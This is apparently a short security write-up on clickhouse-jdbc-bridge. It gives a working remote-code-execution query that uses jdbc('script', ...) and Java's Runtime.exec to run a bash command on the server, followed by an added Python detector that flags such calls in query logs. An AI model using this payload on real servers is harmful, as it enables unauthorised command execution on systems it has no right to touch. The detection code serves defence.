What is clickhouse-jdbc-bridge
JDBC bridge for ClickHouse. It acts as a stateless proxy passing queries from ClickHouse to external datasources. With this extension, you can run distributed query on ClickHouse across multiple datasources in real time, which in a way simplifies the process of building data pipelines for data warehousing, monitoring and integrity check etc.
Simply put, it is a component on the ClickHouse server side whose function is to create new JDBC connections.
https://github.com/ClickHouse/clickhouse-jdbc-bridge
RCE
When we connect to ClickHouse and the server supports clickhouse-jdbc-bridge, the following command can be entered to achieve RCE:
SELECT *
FROM jdbc('script', 's=[3];s[0]="/bin/bash";s[1]="-c";s[2]="touch /tmp/1.txt";java.lang.Runtime.getRuntime().exec(s);')
Afterwards, 1.txt can be seen in the /tmp directory on the server.
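For detection, the query text above has a recognisable shape: a call to the jdbc() table function whose first argument is the 'script' datasource. The following is an added example, not code from the original post or from the ClickHouse project; the function names are hypothetical, and the sample entries are constructed, with field names that assume a log exported from the user and query columns of system.query_log.

```python
import re

# Whitespace or SQL comments that may sit between tokens of the call.
GAP = r"(?:\s|/\*.*?\*/|--[^\n]*\n)*"
# jdbc( '<first argument>' ... : capture the first string literal, which names
# the datasource. Matched case-insensitively to over-match rather than miss.
JDBC_CALL = re.compile(
    rf"\bjdbc{GAP}\({GAP}'((?:[^'\\]|\\.|'')*)'", re.IGNORECASE | re.DOTALL
)

def jdbc_datasources(query):
    """Return the first argument of every jdbc() call found in a query string."""
    return [m.group(1) for m in JDBC_CALL.finditer(query)]

def uses_script_datasource(query):
    """True if any jdbc() call names the 'script' datasource shown above."""
    return any(ds.strip().lower() == "script" for ds in jdbc_datasources(query))

def flag_entries(entries):
    """Return (user, query) for each log entry that calls jdbc('script', ...)."""
    return [(e["user"], e["query"]) for e in entries
            if uses_script_datasource(e["query"])]

# Constructed sample entries (not real logs). Field names are an assumption
# about how system.query_log was exported; 'mysql-prod' is a made-up datasource.
SAMPLE_LOG = [
    {"user": "app", "query": "SELECT count() FROM events WHERE note = 'script'"},
    {"user": "etl", "query": "SELECT * FROM jdbc('mysql-prod', 'SELECT 1')"},
    {"user": "default", "query": "SELECT *\nFROM jdbc('script', '1 + 1')"},
    {"user": "default", "query": "select * from JDBC /* x */ ( 'script' , '1 + 1')"},
]

if __name__ == "__main__":
    for user, query in flag_entries(SAMPLE_LOG):
        print(f"ALERT user={user} query={query!r}")
```

The match covers only a string-literal first argument, so it is a starting point for alerting rather than a complete parser of ClickHouse SQL.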